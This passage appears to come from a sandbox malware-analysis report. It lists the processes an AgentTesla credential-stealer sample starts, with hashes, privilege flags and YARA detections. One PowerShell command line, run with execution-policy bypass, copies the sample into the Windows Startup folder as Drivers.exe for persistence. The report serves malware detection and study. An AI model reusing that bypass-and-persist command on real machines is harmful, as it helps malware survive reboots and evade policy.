                                      Path:C:\Users\user\Desktop\NKPhba0VZI.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\NKPhba0VZI.exe
                                      Imagebase:0x800000
                                      File size:620032 bytes
                                      MD5 hash:3A89CF2D6D2449EF1A9640AF29F3A782
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.463182723.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Start time:12:25:54
                                      Start date:25/02/2021
                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                                      Imagebase:0x6e0000
                                      File size:620032 bytes
                                      MD5 hash:3A89CF2D6D2449EF1A9640AF29F3A782
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000000A.00000002.301353554.0000000005100000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000003.285607498.0000000000D75000.00000004.00000001.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 26%, ReversingLabs
                                      Reputation:low

                                      General

                                      Start time:12:25:56
                                      Start date:25/02/2021
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                                      Imagebase:0x1110000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      General

                                      Start time:12:25:57
                                      Start date:25/02/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6b2800000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:12:25:58
                                      Start date:25/02/2021
                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                      Imagebase:0x970000
                                      File size:620032 bytes
                                      MD5 hash:3A89CF2D6D2449EF1A9640AF29F3A782
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.463217997.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                      Reputation:low
